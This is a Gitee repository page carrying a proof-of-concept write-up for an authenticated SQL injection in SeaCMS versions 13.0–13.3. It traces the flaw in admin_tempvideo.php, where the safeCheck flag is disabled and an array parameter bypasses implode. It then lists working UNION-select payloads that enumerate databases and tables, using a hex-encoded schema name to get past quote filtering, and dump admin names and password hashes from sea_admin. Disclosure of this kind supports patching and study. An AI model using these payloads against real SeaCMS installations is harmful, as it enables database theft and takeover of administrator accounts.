Loading web-font TeX/Math/Italic
1 Star 0 Fork 0

高宇/B00W_NSD

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
seacms13.3-sql
image-20250308005149441.png
image-20250308005434766.png
image-20250308005454980.png
image-20250308005607793.png
image-20250308005620083.png
image-20250308005916166.png
image-20250308010343844.png
image-20250308010438162.png
image-20250308010513600.png
image-20250308010715951.png
image-20250308010830972.png
image-20250308010956634.png
poc.md
README.en.md
README.md
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
poc.md 3.20 KB
一键复制 编辑 原始数据 按行查看 历史
高宇 提交于 1个月前 . seacms13.3-sql

Seacms V13.3 has a SQL injection vulnerability that allows an authenticated attacker to exploit the database.

Download:https://www.seacms.com/download/

image-20250308005149441

*Affected versions: 13.0-13.3*

Demo Version: 13.3

Code Audit Process

Open Backstage admin_tempvideo.php

image-20250308005916166

Going back to the included config configuration file, you can pass parameters

Let action = import

However, eidcontrolsids, so the parameters are controllable

Then follow the execution of the sql statement to see if there are any restrictions

image-20250308005434766

This one doesn't have

image-20250308005454980

The developer commented here that there is a safety check, so see if the value of safeCheck is true or false

Go up

image-20250308005607793

It is found that when sql is initialized, it is assigned to true

However, it is also found that the included config configuration file assigns safeCheck to false

image-20250308005620083

Therefore, admin_tempvideo.php calls the sql object in config.php, and the value changes from false to true, so the parameters are not filtered.

Therefore, the sql statement is constructed. Here, $e_id has implode and is bypassed by using an array.

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

image-20250308010343844

There is an echo here

Try to modify the data in 3 and execute as follows

image-20250308010438162

Found that the echo was successful, and then started

KULOOD VIOLENCE

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(schema_name)+from+information_schema.schemata),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

image-20250308010513600

OUT OF THIS POINT

image-20250308010715951

I found that there was no echo, which should be an error.

I printed the sql statement at the execution point and found that ' " was moved.

So I used coding to bypass it.

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=0x736561636D73312E33),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

image-20250308010830972

Explosive Value

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(name,0x3a,password)+from+sea_admin),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

image-20250308010956634

End

All the data in the database can be obtained from now on

This version is seacms 13.3

The same is true when testing version 13.0, that is, 13.0 also has the same vulnerability

Therefore****Affects versions 13.0-13.3****

Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/B00W_NSD/poc.git
git@gitee.com:B00W_NSD/poc.git
B00W_NSD
poc
B00W_NSD
master

搜索帮助